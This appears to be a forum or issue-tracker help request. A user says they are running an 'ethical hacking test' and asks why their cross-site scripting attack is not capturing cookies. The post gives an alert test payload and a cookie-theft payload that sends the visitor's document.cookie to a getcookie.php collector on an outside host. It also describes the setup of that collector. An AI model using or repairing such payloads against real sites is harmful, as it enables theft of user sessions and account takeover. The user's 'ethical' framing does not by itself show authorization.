XSS help #355
Description
I'm doing an ethical hacking test, I tested an XSS payload : <script>alert("xss")</script> on a website, and the pop-up appears, so I want to collect user cookie
I created a getcookie.php file and a cookies.txt file and and I uploaded both files to a hosting server,
I placed the two files in the htdocs folder, which now contains index.html, getcookie.php and a cookies.txt
This is the getcookie.php file:
When I try this in the search box: : <script>document.location="http://website.com/getcookie.php?c="+document.cookie;</script>
I get this URL:
https://website2/search/?section=all&query=<script>document.location="http:SLASHSLASHwebsite.comSLASHgetcookie.php?c="+document.cookie;&path=SLASH
and I don't see any cookies in cookies.txt
What am I doing wrong, please? I've tried lot of payloads in the past 3 days but no results,
when I type http://website.com/getcookie.php in a new tab, I get the cookie but it's empty, I get this text : Cookie:
Thank you